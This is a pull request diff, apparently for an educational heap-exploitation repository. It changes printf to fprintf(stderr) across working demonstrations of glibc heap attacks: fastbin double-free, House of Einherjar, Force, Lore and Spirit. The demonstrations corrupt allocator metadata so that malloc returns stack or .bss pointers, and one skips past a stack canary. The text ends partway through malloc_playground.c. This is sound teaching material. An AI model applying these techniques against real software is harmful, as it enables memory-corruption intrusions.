### PR TITLE
REFACTOR: Exchange printf for fprintf - prevents heap usage from vfprintf family.

### DIFF
--- a/fastbin_dup.c
+++ b/fastbin_dup.c
@@ -3,31 +3,31 @@
 
 int main()
 {
-	printf("This file demonstrates a simple double-free attack with fastbins.\n");
+	fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\n");
 
-	printf("Allocating 3 buffers.\n");
+	fprintf(stderr, "Allocating 3 buffers.\n");
 	int *a = malloc(8);
 	int *b = malloc(8);
 	int *c = malloc(8);
 
-	printf("1st malloc(8): %p\n", a);
-	printf("2nd malloc(8): %p\n", b);
-	printf("3rd malloc(8): %p\n", c);
+	fprintf(stderr, "1st malloc(8): %p\n", a);
+	fprintf(stderr, "2nd malloc(8): %p\n", b);
+	fprintf(stderr, "3rd malloc(8): %p\n", c);
 
-	printf("Freeing the first one...\n");
+	fprintf(stderr, "Freeing the first one...\n");
 	free(a);
 
-	printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
+	fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
 	// free(a);
 
-	printf("So, instead, we'll free %p.\n", b);
+	fprintf(stderr, "So, instead, we'll free %p.\n", b);
 	free(b);
 
-	printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
+	fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
 	free(a);
 
-	printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
-	printf("1st malloc(8): %p\n", malloc(8));
-	printf("2nd malloc(8): %p\n", malloc(8));
-	printf("3rd malloc(8): %p\n", malloc(8));
+	fprintf(stderr, "Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
+	fprintf(stderr, "1st malloc(8): %p\n", malloc(8));
+	fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
+	fprintf(stderr, "3rd malloc(8): %p\n", malloc(8));
 }

--- a/fastbin_dup_into_stack.c
+++ b/fastbin_dup_into_stack.c
@@ -3,50 +3,50 @@
 
 int main()
 {
-	printf("This file extends on fastbin_dup.c by tricking malloc into\n"
+	fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
 	       "returning a pointer to a controlled location (in this case, the stack).\n");
 
 	unsigned long long stack_var;
 
-	printf("The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);
+	fprintf(stderr, "The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);
 
-	printf("Allocating 3 buffers.\n");
+	fprintf(stderr, "Allocating 3 buffers.\n");
 	int *a = malloc(8);
 	int *b = malloc(8);
 	int *c = malloc(8);
 
-	printf("1st malloc(8): %p\n", a);
-	printf("2nd malloc(8): %p\n", b);
-	printf("3rd malloc(8): %p\n", c);
+	fprintf(stderr, "1st malloc(8): %p\n", a);
+	fprintf(stderr, "2nd malloc(8): %p\n", b);
+	fprintf(stderr, "3rd malloc(8): %p\n", c);
 
-	printf("Freeing the first one...\n");
+	fprintf(stderr, "Freeing the first one...\n");
 	free(a);
 
-	printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
+	fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
 	// free(a);
 
-	printf("So, instead, we'll free %p.\n", b);
+	fprintf(stderr, "So, instead, we'll free %p.\n", b);
 	free(b);
 
-	printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
+	fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
 	free(a);
 
-	printf("Now the free list has [ %p, %p, %p ]. "
+	fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
 		"We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
 	unsigned long long *d = malloc(8);
 
-	printf("1st malloc(8): %p\n", d);
-	printf("2nd malloc(8): %p\n", malloc(8));
-	printf("Now the free list has [ %p ].\n", a);
-	printf("Now, we have access to %p while it remains at the head of the free list.\n"
+	fprintf(stderr, "1st malloc(8): %p\n", d);
+	fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
+	fprintf(stderr, "Now the free list has [ %p ].\n", a);
+	fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
 		"so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
 		"so that malloc will think there is a free chunk there and agree to\n"
 		"return a pointer to it.\n", a);
 	stack_var = 0x20;
 
-	printf("Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
+	fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
 	*d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
 
-	printf("3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
-	printf("4th malloc(8): %p\n", malloc(8));
+	fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
+	fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
 }

--- a/first_fit.c
+++ b/first_fit.c
@@ -4,34 +4,34 @@
 
 int main()
 {
-	printf("This file doesn't demonstrate an attack, but shows the nature of glibc's allocator.\n");
-	printf("glibc uses a first-fit algorithm to select a free chunk.\n");
-	printf("If a chunk is free and large enough, malloc will select this chunk.\n");
-	printf("This can be exploited in a use-after-free situation.\n");
+	fprintf(stderr, "This file doesn't demonstrate an attack, but shows the nature of glibc's allocator.\n");
+	fprintf(stderr, "glibc uses a first-fit algorithm to select a free chunk.\n");
+	fprintf(stderr, "If a chunk is free and large enough, malloc will select this chunk.\n");
+	fprintf(stderr, "This can be exploited in a use-after-free situation.\n");
 
-	printf("Allocating 2 buffers. They can be large, don't have to be fastbin.\n");
+	fprintf(stderr, "Allocating 2 buffers. They can be large, don't have to be fastbin.\n");
 	char* a = malloc(512);
 	char* b = malloc(256);
 	char* c;
 
-	printf("1st malloc(512): %p\n", a);
-	printf("2nd malloc(256): %p\n", b);
-	printf("we could continue mallocing here...\n");
-	printf("now let's put a string at a that we can read later \"this is A!\"\n");
+	fprintf(stderr, "1st malloc(512): %p\n", a);
+	fprintf(stderr, "2nd malloc(256): %p\n", b);
+	fprintf(stderr, "we could continue mallocing here...\n");
+	fprintf(stderr, "now let's put a string at a that we can read later \"this is A!\"\n");
 	strcpy(a, "this is A!");
-	printf("first allocation %p points to %s\n", a, a);
+	fprintf(stderr, "first allocation %p points to %s\n", a, a);
 
-	printf("Freeing the first one...\n");
+	fprintf(stderr, "Freeing the first one...\n");
 	free(a);
 
-	printf("We don't need to free anything again. As long as we allocate less than 512, it will end up at %p\n", a);
+	fprintf(stderr, "We don't need to free anything again. As long as we allocate less than 512, it will end up at %p\n", a);
 
-	printf("So, let's allocate 500 bytes\n");
+	fprintf(stderr, "So, let's allocate 500 bytes\n");
 	c = malloc(500);
-	printf("3rd malloc(500): %p\n", c);
-	printf("And put a different string here, \"this is C!\"\n");
+	fprintf(stderr, "3rd malloc(500): %p\n", c);
+	fprintf(stderr, "And put a different string here, \"this is C!\"\n");
 	strcpy(c, "this is C!");
-	printf("3rd allocation %p points to %s\n", c, c);
-	printf("first allocation %p points to %s\n", a, a);
-	printf("If we reuse the first allocation, it now holds the data from the third allocation.");
+	fprintf(stderr, "3rd allocation %p points to %s\n", c, c);
+	fprintf(stderr, "first allocation %p points to %s\n", a, a);
+	fprintf(stderr, "If we reuse the first allocation, it now holds the data from the third allocation.");
 }

--- a/house_of_einherjar.c
+++ b/house_of_einherjar.c
@@ -12,26 +12,26 @@
 
 int main()
 {
-	printf("Welcome to House of Einherjar!\n");
-	printf("Tested in Ubuntu 16.04 64bit.\n");
-	printf("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");
+	fprintf(stderr, "Welcome to House of Einherjar!\n");
+	fprintf(stderr, "Tested in Ubuntu 16.04 64bit.\n");
+	fprintf(stderr, "This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");
 
 	uint8_t* a;
 	uint8_t* b;
 	uint8_t* d;
 
-	printf("\nWe allocate 0x38 bytes for 'a'\n");
+	fprintf(stderr, "\nWe allocate 0x38 bytes for 'a'\n");
 	a = (uint8_t*) malloc(0x38);
-	printf("a: %p\n", a);
+	fprintf(stderr, "a: %p\n", a);
     
     int real_a_size = malloc_usable_size(a);
-    printf("Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);
+    fprintf(stderr, "Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);
 
     // create a fake chunk
-    printf("\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
-    printf("However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
-    printf("We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
-    printf("(although we could do the unsafe unlink technique here in some scenarios)\n");
+    fprintf(stderr, "\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
+    fprintf(stderr, "However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
+    fprintf(stderr, "We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
+    fprintf(stderr, "(although we could do the unsafe unlink technique here in some scenarios)\n");
 
     size_t fake_chunk[6];
 
@@ -43,13 +43,13 @@ int main()
     fake_chunk[5] = (size_t) fake_chunk; //bck_nextsize
     
     
-    printf("Our fake chunk at %p looks like:\n", fake_chunk);
-    printf("prev_size (not used): %#lx\n", fake_chunk[0]);
-    printf("size: %#lx\n", fake_chunk[1]);
-    printf("fwd: %#lx\n", fake_chunk[2]);
-    printf("bck: %#lx\n", fake_chunk[3]);
-    printf("fwd_nextsize: %#lx\n", fake_chunk[4]);
-    printf("bck_nextsize: %#lx\n", fake_chunk[5]);
+    fprintf(stderr, "Our fake chunk at %p looks like:\n", fake_chunk);
+    fprintf(stderr, "prev_size (not used): %#lx\n", fake_chunk[0]);
+    fprintf(stderr, "size: %#lx\n", fake_chunk[1]);
+    fprintf(stderr, "fwd: %#lx\n", fake_chunk[2]);
+    fprintf(stderr, "bck: %#lx\n", fake_chunk[3]);
+    fprintf(stderr, "fwd_nextsize: %#lx\n", fake_chunk[4]);
+    fprintf(stderr, "bck_nextsize: %#lx\n", fake_chunk[5]);
 
 	/* In this case it is easier if the chunk size attribute has a least significant byte with
 	 * a value of 0x00. The least significant byte of this will be 0x00, because the size of 
@@ -57,37 +57,37 @@ int main()
 	b = (uint8_t*) malloc(0xf8);
     int real_b_size = malloc_usable_size(b);
 
-	printf("\nWe allocate 0xf8 bytes for 'b'.\n");
-	printf("b: %p\n", b);
+	fprintf(stderr, "\nWe allocate 0xf8 bytes for 'b'.\n");
+	fprintf(stderr, "b: %p\n", b);
 
 	uint64_t* b_size_ptr = (uint64_t*)(b - 8);
     /* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/
 
-	printf("\nb.size: %#lx\n", *b_size_ptr);
-	printf("b.size is: (0x100) | prev_inuse = 0x101\n");
-	printf("We overflow 'a' with a single null byte into the metadata of 'b'\n");
+	fprintf(stderr, "\nb.size: %#lx\n", *b_size_ptr);
+	fprintf(stderr, "b.size is: (0x100) | prev_inuse = 0x101\n");
+	fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
 	a[real_a_size] = 0; 
-	printf("b.size: %#lx\n", *b_size_ptr);
-    printf("This is easiest if b.size is a multiple of 0x100 so you "
+	fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
+    fprintf(stderr, "This is easiest if b.size is a multiple of 0x100 so you "
            "don't change the size of b, only its prev_inuse bit\n");
-    printf("If it had been modified, we would need a fake chunk inside "
+    fprintf(stderr, "If it had been modified, we would need a fake chunk inside "
            "b where it will try to consolidate the next chunk\n");
 
     // Write a fake prev_size to the end of a
-    printf("\nWe write a fake prev_size to the last %lu bytes of a so that "
+    fprintf(stderr, "\nWe write a fake prev_size to the last %lu bytes of a so that "
            "it will consolidate with our fake chunk\n", sizeof(size_t));
     size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
-    printf("Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
+    fprintf(stderr, "Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
     *(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;
 
     //Change the fake chunk's size to reflect b's new prev_size
-    printf("\nModify fake chunk's size to reflect b's new prev_size\n");
+    fprintf(stderr, "\nModify fake chunk's size to reflect b's new prev_size\n");
     fake_chunk[1] = fake_size;
 
     // free b and it will consolidate with our fake chunk
-    printf("Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
+    fprintf(stderr, "Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
     free(b);
-    printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);
+    fprintf(stderr, "Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);
 
     //if we allocate another chunk before we free b we will need to 
     //do two things: 
@@ -100,7 +100,7 @@ int main()
     //otherwise we need to make sure that our fake chunk is up against the
     //wilderness
 
-    printf("\nNow we can call malloc() and it will begin in our fake chunk\n");
+    fprintf(stderr, "\nNow we can call malloc() and it will begin in our fake chunk\n");
     d = malloc(0x200);
-    printf("Next malloc(0x200) is at %p\n", d);
+    fprintf(stderr, "Next malloc(0x200) is at %p\n", d);
 }

--- a/house_of_force.c
+++ b/house_of_force.c
@@ -21,68 +21,68 @@ char bss_var[] = "This is a string that we want to overwrite.";
 
 int main(int argc , char* argv[])
 {
-	printf("\nWelcome to the House of Force\n\n");
-	printf("The idea of House of Force is to overwrite the top chunk and let the malloc return an arbitrary value.\n");
-	printf("The top chunk is a special chunk. Is the last in memory "
+	fprintf(stderr, "\nWelcome to the House of Force\n\n");
+	fprintf(stderr, "The idea of House of Force is to overwrite the top chunk and let the malloc return an arbitrary value.\n");
+	fprintf(stderr, "The top chunk is a special chunk. Is the last in memory "
 		"and is the chunk that will be resized when malloc asks for more space from the os.\n");
 
-	printf("\nIn the end, we will use this to overwrite a variable at %p.\n", bss_var);
-	printf("Its current value is: %s\n", bss_var);
+	fprintf(stderr, "\nIn the end, we will use this to overwrite a variable at %p.\n", bss_var);
+	fprintf(stderr, "Its current value is: %s\n", bss_var);
 
 
 
-	printf("\nLet's allocate the first chunk, taking space from the wilderness.\n");
+	fprintf(stderr, "\nLet's allocate the first chunk, taking space from the wilderness.\n");
 	intptr_t *p1 = malloc(256);
-	printf("The chunk of 256 bytes has been allocated at %p.\n", p1);
+	fprintf(stderr, "The chunk of 256 bytes has been allocated at %p.\n", p1);
 
-	printf("\nNow the heap is composed of two chunks: the one we allocated and the top chunk/wilderness.\n");
+	fprintf(stderr, "\nNow the heap is composed of two chunks: the one we allocated and the top chunk/wilderness.\n");
 	int real_size = malloc_usable_size(p1);
-	printf("Real size (aligned and all that jazz) of our allocated chunk is %d.\n", real_size);
+	fprintf(stderr, "Real size (aligned and all that jazz) of our allocated chunk is %d.\n", real_size);
 
-	printf("\nNow let's emulate a vulnerability that can overwrite the header of the Top Chunk\n");
+	fprintf(stderr, "\nNow let's emulate a vulnerability that can overwrite the header of the Top Chunk\n");
 
 	//----- VULNERABILITY ----
 	intptr_t *ptr_top = (intptr_t *) ((char *)p1 + real_size);
-	printf("\nThe top chunk starts at %p\n", ptr_top);
+	fprintf(stderr, "\nThe top chunk starts at %p\n", ptr_top);
 
-	printf("\nOverwriting the top chunk size with a big value so we can ensure that the malloc will never call mmap.\n");
-	printf("Old size of top chunk %#llx\n", *((unsigned long long int *)ptr_top));
+	fprintf(stderr, "\nOverwriting the top chunk size with a big value so we can ensure that the malloc will never call mmap.\n");
+	fprintf(stderr, "Old size of top chunk %#llx\n", *((unsigned long long int *)ptr_top));
 	ptr_top[0] = -1;
-	printf("New size of top chunk %#llx\n", *((unsigned long long int *)ptr_top));
+	fprintf(stderr, "New size of top chunk %#llx\n", *((unsigned long long int *)ptr_top));
 	//------------------------
 
-	printf("\nThe size of the wilderness is now gigantic. We can allocate anything without malloc() calling mmap.\n"
+	fprintf(stderr, "\nThe size of the wilderness is now gigantic. We can allocate anything without malloc() calling mmap.\n"
 	   "Next, we will allocate a chunk that will get us right up against the desired region (with an integer\n"
 	   "overflow) and will then be able to allocate a chunk right over the desired region.\n");
 
 	unsigned long evil_size = (unsigned long)bss_var - sizeof(long)*2 - (unsigned long)ptr_top;
-	printf("\nThe value we want to write to at %p, and the top chunk is at %p, so accounting for the header size,\n"
+	fprintf(stderr, "\nThe value we want to write to at %p, and the top chunk is at %p, so accounting for the header size,\n"
 	   "we will malloc %#lx bytes.\n", bss_var, ptr_top, evil_size);
 	void *new_ptr = malloc(evil_size);
-	printf("As expected, the new pointer is at the same place as the old top chunk: %p\n", new_ptr);
+	fprintf(stderr, "As expected, the new pointer is at the same place as the old top chunk: %p\n", new_ptr);
 
 	void* ctr_chunk = malloc(100);
-	printf("\nNow, the next chunk we overwrite will point at our target buffer.\n");
-	printf("malloc(100) => %p!\n", ctr_chunk);
-	printf("Now, we can finally overwrite that value:\n");
+	fprintf(stderr, "\nNow, the next chunk we overwrite will point at our target buffer.\n");
+	fprintf(stderr, "malloc(100) => %p!\n", ctr_chunk);
+	fprintf(stderr, "Now, we can finally overwrite that value:\n");
 
-	printf("... old string: %s\n", bss_var);
-	printf("... doing strcpy overwrite with \"YEAH!!!\"...\n");
+	fprintf(stderr, "... old string: %s\n", bss_var);
+	fprintf(stderr, "... doing strcpy overwrite with \"YEAH!!!\"...\n");
 	strcpy(ctr_chunk, "YEAH!!!");
-	printf("... new string: %s\n", bss_var);
+	fprintf(stderr, "... new string: %s\n", bss_var);
 
 
 	// some further discussion:
-	//printf("This controlled malloc will be called with a size parameter of evil_size = malloc_got_address - 8 - p2_guessed\n\n");
-	//printf("This because the main_arena->top pointer is setted to current av->top + malloc_size "
+	//fprintf(stderr, "This controlled malloc will be called with a size parameter of evil_size = malloc_got_address - 8 - p2_guessed\n\n");
+	//fprintf(stderr, "This because the main_arena->top pointer is setted to current av->top + malloc_size "
 	//	"and we \nwant to set this result to the address of malloc_got_address-8\n\n");
-	//printf("In order to do this we have malloc_got_address-8 = p2_guessed + evil_size\n\n");
-	//printf("The av->top after this big malloc will be setted in this way to malloc_got_address-8\n\n");
-	//printf("After that a new call to malloc will return av->top+8 ( +8 bytes for the header ),"
+	//fprintf(stderr, "In order to do this we have malloc_got_address-8 = p2_guessed + evil_size\n\n");
+	//fprintf(stderr, "The av->top after this big malloc will be setted in this way to malloc_got_address-8\n\n");
+	//fprintf(stderr, "After that a new call to malloc will return av->top+8 ( +8 bytes for the header ),"
 	//	"\nand basically return a chunk at (malloc_got_address-8)+8 = malloc_got_address\n\n");
 
-	//printf("The large chunk with evil_size has been allocated here 0x%08x\n",p2);
-	//printf("The main_arena value av->top has been setted to malloc_got_address-8=0x%08x\n",malloc_got_address);
+	//fprintf(stderr, "The large chunk with evil_size has been allocated here 0x%08x\n",p2);
+	//fprintf(stderr, "The main_arena value av->top has been setted to malloc_got_address-8=0x%08x\n",malloc_got_address);
 
-	//printf("This last malloc will be served from the remainder code and will return the av->top+8 injected before\n");
+	//fprintf(stderr, "This last malloc will be served from the remainder code and will return the av->top+8 injected before\n");
 }

--- a/house_of_lore.c
+++ b/house_of_lore.c
@@ -34,78 +34,78 @@ int main(int argc, char * argv[]){
   intptr_t* stack_buffer_1[4] = {0};
   intptr_t* stack_buffer_2[3] = {0};
 
-  printf("\nWelcome to the House of Lore\n");
-  printf("This is a revisited version that bypass also the hardening check introduced by glibc malloc\n");
-  printf("This is tested against Ubuntu 14.04.4 - 32bit - glibc-2.23\n\n");
+  fprintf(stderr, "\nWelcome to the House of Lore\n");
+  fprintf(stderr, "This is a revisited version that bypass also the hardening check introduced by glibc malloc\n");
+  fprintf(stderr, "This is tested against Ubuntu 14.04.4 - 32bit - glibc-2.23\n\n");
 
-  printf("Allocating the victim chunk\n");
+  fprintf(stderr, "Allocating the victim chunk\n");
   intptr_t *victim = malloc(100);
-  printf("Allocated the first small chunk on the heap at %p\n", victim);
+  fprintf(stderr, "Allocated the first small chunk on the heap at %p\n", victim);
 
   // victim-WORD_SIZE because we need to remove the header size in order to have the absolute address of the chunk
   intptr_t *victim_chunk = victim-2;
 
-  printf("stack_buffer_1 at %p\n", (void*)stack_buffer_1);
-  printf("stack_buffer_2 at %p\n", (void*)stack_buffer_2);
+  fprintf(stderr, "stack_buffer_1 at %p\n", (void*)stack_buffer_1);
+  fprintf(stderr, "stack_buffer_2 at %p\n", (void*)stack_buffer_2);
 
-  printf("Create a fake chunk on the stack");
-  printf("Set the fwd pointer to the victim_chunk in order to bypass the check of small bin corrupted"
+  fprintf(stderr, "Create a fake chunk on the stack");
+  fprintf(stderr, "Set the fwd pointer to the victim_chunk in order to bypass the check of small bin corrupted"
          "in second to the last malloc, which putting stack address on smallbin list\n");
   stack_buffer_1[0] = 0;
   stack_buffer_1[1] = 0;
   stack_buffer_1[2] = victim_chunk;
 
-  printf("Set the bk pointer to stack_buffer_2 and set the fwd pointer of stack_buffer_2 to point to stack_buffer_1 "
+  fprintf(stderr, "Set the bk pointer to stack_buffer_2 and set the fwd pointer of stack_buffer_2 to point to stack_buffer_1 "
          "in order to bypass the check of small bin corrupted in last malloc, which returning pointer to the fake "
          "chunk on stack");
   stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
   stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
   
-  printf("Allocating another large chunk in order to avoid consolidating the top chunk with"
+  fprintf(stderr, "Allocating another large chunk in order to avoid consolidating the top chunk with"
          "the small one during the free()\n");
   void *p5 = malloc(1000);
-  printf("Allocated the large chunk on the heap at %p\n", p5);
+  fprintf(stderr, "Allocated the large chunk on the heap at %p\n", p5);
 
 
-  printf("Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
+  fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
   free((void*)victim);
 
-  printf("\nIn the unsorted bin the victim's fwd and bk pointers are nil\n");
-  printf("victim->fwd: %p\n", (void *)victim[0]);
-  printf("victim->bk: %p\n\n", (void *)victim[1]);
+  fprintf(stderr, "\nIn the unsorted bin the victim's fwd and bk pointers are nil\n");
+  fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
+  fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
 
-  printf("Now performing a malloc that can't be handled by the UnsortedBin, nor the small bin\n");
-  printf("This means that the chunk %p will be inserted in front of the SmallBin\n", victim);
+  fprintf(stderr, "Now performing a malloc that can't be handled by the UnsortedBin, nor the small bin\n");
+  fprintf(stderr, "This means that the chunk %p will be inserted in front of the SmallBin\n", victim);
 
   void *p2 = malloc(1200);
-  printf("The chunk that can't be handled by the unsorted bin, nor the SmallBin has been allocated to %p\n", p2);
+  fprintf(stderr, "The chunk that can't be handled by the unsorted bin, nor the SmallBin has been allocated to %p\n", p2);
 
-  printf("The victim chunk has been sorted and its fwd and bk pointers updated\n");
-  printf("victim->fwd: %p\n", (void *)victim[0]);
-  printf("victim->bk: %p\n\n", (void *)victim[1]);
+  fprintf(stderr, "The victim chunk has been sorted and its fwd and bk pointers updated\n");
+  fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
+  fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
 
   //------------VULNERABILITY-----------
 
-  printf("Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
+  fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
 
   victim[1] = (intptr_t)stack_buffer_1; // victim->bk is pointing to stack
 
   //------------------------------------
 
-  printf("Now allocating a chunk with size equal to the first one freed\n");
-  printf("This should return the overwritten victim chunk and set the bin->bk to the injected victim->bk pointer\n");
+  fprintf(stderr, "Now allocating a chunk with size equal to the first one freed\n");
+  fprintf(stderr, "This should return the overwritten victim chunk and set the bin->bk to the injected victim->bk pointer\n");
 
   void *p3 = malloc(100);
 
 
-  printf("This last malloc should trick the glibc malloc to return a chunk at the position injected in bin->bk\n");
+  fprintf(stderr, "This last malloc should trick the glibc malloc to return a chunk at the position injected in bin->bk\n");
   char *p4 = malloc(100);
-  printf("p4 = malloc(100)\n");
+  fprintf(stderr, "p4 = malloc(100)\n");
 
-  printf("\nThe fwd pointer of stack_buffer_2 has changed after the last malloc to %p\n",
+  fprintf(stderr, "\nThe fwd pointer of stack_buffer_2 has changed after the last malloc to %p\n",
          stack_buffer_2[2]);
 
-  printf("\np4 is %p and should be on the stack!\n", p4); // this chunk will be allocated on stack
+  fprintf(stderr, "\np4 is %p and should be on the stack!\n", p4); // this chunk will be allocated on stack
   intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode
   memcpy((p4+40), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary
 }

--- a/house_of_spirit.c
+++ b/house_of_spirit.c
@@ -3,33 +3,33 @@
 
 int main()
 {
-	printf("This file demonstrates the house of spirit attack.\n");
+	fprintf(stderr, "This file demonstrates the house of spirit attack.\n");
 
-	printf("Calling malloc() once so that it sets up its memory.\n");
+	fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
 	malloc(1);
 
-	printf("We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
+	fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
 	unsigned long long *a;
 	// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
 	unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));
 
-	printf("This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[7]);
+	fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[7]);
 
-	printf("This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
-	printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
+	fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
+	fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
 	fake_chunks[1] = 0x40; // this is the size
 
-	printf("The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
+	fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
         // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
 	fake_chunks[9] = 0x1234; // nextsize
 
-	printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
-	printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
+	fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
+	fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
 	a = &fake_chunks[2];
 
-	printf("Freeing the overwritten pointer.\n");
+	fprintf(stderr, "Freeing the overwritten pointer.\n");
 	free(a);
 
-	printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
-	printf("malloc(0x30): %p\n", malloc(0x30));
+	fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
+	fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
 }

--- a/malloc_playground.c
+++ b/malloc_playground.c
@@ -7,7 +7,7 @@
 # include <mcheck.h>
 void print_mcheck_status(enum mcheck_status s)
 {
-	printf("%s\n", (s == MCHECK_DISABLED) ? "N/A, you didn't enable mcheck()" :
+	fprintf(stderr, "%s\n", (s == MCHECK_DISABLED) ? "N/A, you didn't enable mcheck()" :
 				   (s == MCHECK_OK) ? "No inconsistency detected" :
 				   (s == MCHECK_HEAD) ? "Memory preceding an allocated block was clobbered" :
 				   (s == MCHECK_TAIL) ? "Memory following an allocated block was clobbered" :
@@ -16,49 +16,49 @@ void print_mcheck_status(enum mcheck_status s)
 }
 void report_mcheck_fail(enum mcheck_status s)
 {
-	printf("*** PROGRAM WOULD ABORT: "); print_mcheck_status(s);
+	fprintf(stderr, "*** PROGRAM WOULD ABORT: "); print_mcheck_status(s);
 }
 #endif
 
 int main(int argc, char ** argv) {
 	char buffer[1000];
 	while (1) {
-		printf("> ");
+		fprintf(stderr, "> ");
 		fgets(buffer, sizeof(buffer), stdin);
 		char cmd[1000];
 		intptr_t arg1, arg2;
 		int num = sscanf(buffer, "%s %"SCNiPTR" %"SCNiPTR, cmd, &arg1, &arg2);
 		if (strcmp(cmd, "malloc") == 0) {
 			void* result = malloc(arg1);
-			printf("==> %p\n", result);
+			fprintf(stderr, "==> %p\n", result);
 		} else if (strcmp(cmd, "free") == 0) {
 			free((void*) arg1);
-			printf("==> ok\n");
